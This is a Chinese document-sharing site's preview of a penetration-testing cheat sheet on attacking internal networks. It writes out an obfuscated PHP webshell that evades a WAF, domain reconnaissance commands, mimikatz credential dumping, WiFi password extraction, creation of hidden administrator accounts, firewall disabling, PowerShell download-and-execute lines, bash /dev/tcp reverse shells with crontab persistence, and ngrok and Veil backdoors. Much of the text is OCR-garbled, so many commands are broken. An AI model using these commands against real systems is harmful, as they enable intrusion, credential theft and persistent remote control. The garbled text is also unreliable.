2023内网渗透知识点总结.docx

上传人:p** 文档编号:982936 上传时间:2024-06-06 格式:DOCX 页数:32 大小:62.37KB
下载 相关 举报
2023内网渗透知识点总结.docx_第1页
第1页 / 共32页
2023内网渗透知识点总结.docx_第2页
第2页 / 共32页
2023内网渗透知识点总结.docx_第3页
第3页 / 共32页
2023内网渗透知识点总结.docx_第4页
第4页 / 共32页
2023内网渗透知识点总结.docx_第5页
第5页 / 共32页
2023内网渗透知识点总结.docx_第6页
第6页 / 共32页
2023内网渗透知识点总结.docx_第7页
第7页 / 共32页
2023内网渗透知识点总结.docx_第8页
第8页 / 共32页
2023内网渗透知识点总结.docx_第9页
第9页 / 共32页
2023内网渗透知识点总结.docx_第10页
第10页 / 共32页
亲,该文档总共32页,到这儿已超出免费预览范围,如果喜欢就下载吧!
资源描述

《2023内网渗透知识点总结.docx》由会员分享,可在线阅读,更多相关《2023内网渗透知识点总结.docx(32页珍藏版)》请在第壹文秘上搜索。

1、内网渗透知识点总结获取webshell进内网测试主站,搜WooyUn历史洞未发现历史洞,github,svn,目录扫描未发现敏感信息,无域传送,端口只开了80端口,找到后台地址,想爆破后台,验证码后台验证,一次性,用ocr识别,找账号,通过google,baidu,bing等搜索,相关邮箱,域名等加常用密码组成字典,发现用户手册,找账号,发现未打码信息,和默认密码,试下登陆成功,找后台,上传有dog,用含有一句话的txt文件打包为zip,php文件即可,c刀被拦,修改config,ini文件php_makeeval(calIuserfuncarray(base64decode,array($_

2、POSTaction);用回调函数,第一个为函数名,二个为传的参数前期信息收集queryuser|qwinsta查看当前在线用户netuser查看本机用户netuser/domain查看域用户netview&netgroupdomaincomputersdomain查看当前域计算机列表第二个查的更多netview/domain查看有几个域netviewde查看de域内共享文件netgroup/domain查看域里面的组netgroupz/domainadmins*/domain查看域管netIocalgroupadministrators/domain/这个也是查域管,是升级为域控时,本地账户

3、也成为域管netgroupdomaincontrol1s,/domain域控nettime/domainnetconfigworkstation当前登录域-计算机名-用户名netuse域控(如)password/user:username相当于这个帐号登录域内主机,可访问资源ipconfigsysteminfotasklist/svetasklist/Sip/Udomainusername/P/V查看远程计算机tasklistnetIocalgroupadministrators&whoami查看当前是不是属于管理组netstat-anonltest/delist:xx查看域控whoami/a

4、ll查看Mandatory1.abeluac级别和sid号netsessoin查看远程连接session(需要管理权限)netshare共享目录cmdkey/1查看保存登陆凭证echo%logonserver%查看登陆域spn-1administratorspn记录Set环境变量dsqueryserver-查找目录中的ADDC/1.DS实例dsqueryuser-查找目录中的用户dsquerycomputer查询所有计算机名称windows2003dir/s*.exe查找指定目录下及子目录下没隐藏文件arp-a发现远程登录密码等密码netpass.exe下载地址:IImimikatz.exep

5、rivilege:debugtoken:elevateIsadump:samIsadump:secretsexitwifi密码:InetshwIanshowprofiIe查处wifi名netshwIanshowprofileWiFi-namekey=clear获取对应wifi的密码ie代理regqueryHKEYJJSERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettingszz/vProxyServerregquery,ZHKEY_CURRENT_

6、USERSoftwareMicrosoftWindowsCurrentVersionInternetSettingsz,pac代理regqueryHKEYJJSERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings*/vAutoConfigUR1./引子tstmai1powershell-11ishang其他常用命令pingicmp连通性vps-ipdns连通性digvps-curlvps:8080http连通性tracertbitsadmin/

7、transfernhttp:/ipxx.exeC:windowstempx.exe一种上传文件=2008fuser-nvtcp80查看端口pidrdesktop-uusernameipIinux连接win远程桌面(有可能不成功)wherefilewin查找文件是否存在找路径,1.inUX下使用命令find-name*.jsp来查找,Windows下,使用for/rc:windowstemp%iin(filelsss.dmp)doecho%inetstat-apngrep8888kill-9PID查看端口并kill远程登录内网主机判断是内网,还是外网,内网转发到VPSInetstat-ano没有

8、开启3389端口,复查下tasklistsvc,查SVChOSt.exe对应的TermService的pid,看netstat相等的pid即3389端口.在主机上添加账号Inetuseradmin1admin1/add&netIocalgroupadministratorsadmin1/add如不允许远程连接,修改注册表REGADD,HK1.MSYSTEMCurrentControlSetControlTerminalServer7vfDenyTSConnections/tREG_DWORD/d00000000/fREGADDHKEY_1.OCA1._MACHINESYSTEMCurrentC

9、ontrolSetControlTerminalServerWinStationsRDP-Tcpyz/vPortNumber/1REG_DWORD/d0x00000d3d/f如果系统未配置过远程桌面服务,第一次开启时还需要添加防火墙规则,允许3389端口,命令如下:netshadvfirewal1firewal1addrulename=zzRemoteDesktopzzprotocol=TCPdir=inlocalport=3389action=allow关闭防火墙netshfirewallsetopmodemode=disable3389user无法添加:http:/www.91ri.org

10、5866.html*隐藏win账户*开启sys权限cmd:IEX(New-ObjectNet.WebClient).DownloadString(,adduser并隐藏:IIEX(New-ObjectNet.WebClient).DownloadString(,winserver有密码强度要求,改为更复杂密码即可:渗透技巧Windows系统的帐户隐藏Ihttps:/3gstudent.github.io3gstudent.github.io%E%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%9

11、0%E6%88%B7%E9%9%90%E8%97%8F/windows的RDP连接记录:httprcoil.me201805%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/Iinuxbashbash-i&devtcp10.O.O.1/80800&1bash-i交互的shell标准错误输出到标准输出devtcp10.O.O.1/8080建立socketipport0/1标准输入到标准输出I(crontab-1;echo,*/60*exec9OdevtcpIP/port;exec0&92&1;bin

12、bash-noprofiIe-i,)crontab-猥琐版I(crontab-1;printf*60*exec90devtcpIP/PORT;exec0&92&1;/bin/bash-noprofiIe-i;rnocrontabforwhoami%100c11)Icrontab-详细介绍Ingrok-backdoorGrok-backdoor是一个简单的基于python的后门,它使用Ngrok隧道进行通信。Ngrok后门可以使用Pyinstaller生成windows,Iinux和mac二进制文件。虽然免杀,但如果开win防火墙会提示,生成后门时会询问是否捆绑ngrok,选择no时,在被攻击机

13、执行时需联网下载ngrok,运行后,telnet连接即可.veil这里,安装问题有点多,我用kali-2018-32安装成功,先安装下列依赖,后按照官方即可。apt-getinstall1ibncurses5*apt-getinstallIibavutil55*apt-getinstal1gcc-mingw-w64*apt-getinstal1wine32生成SheIl./Veil,pyuse1usecmeterpreterrev_tcp在win用mingw下gcc编译bypass360gcc-ov.exev.c-lws232使用之前生成的veil,rcmsfconsole-rveil,rc一句话开启http服务,虚拟机里开启,在外访问虚拟机ip即可下载虚拟机文件:python-mS

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 文学/艺术/历史 > 民俗传统

copyright@ 2008-2023 1wenmi网站版权所有

经营许可证编号:宁ICP备2022001189号-1

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。第壹文秘仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第壹文秘网,我们立即给予删除!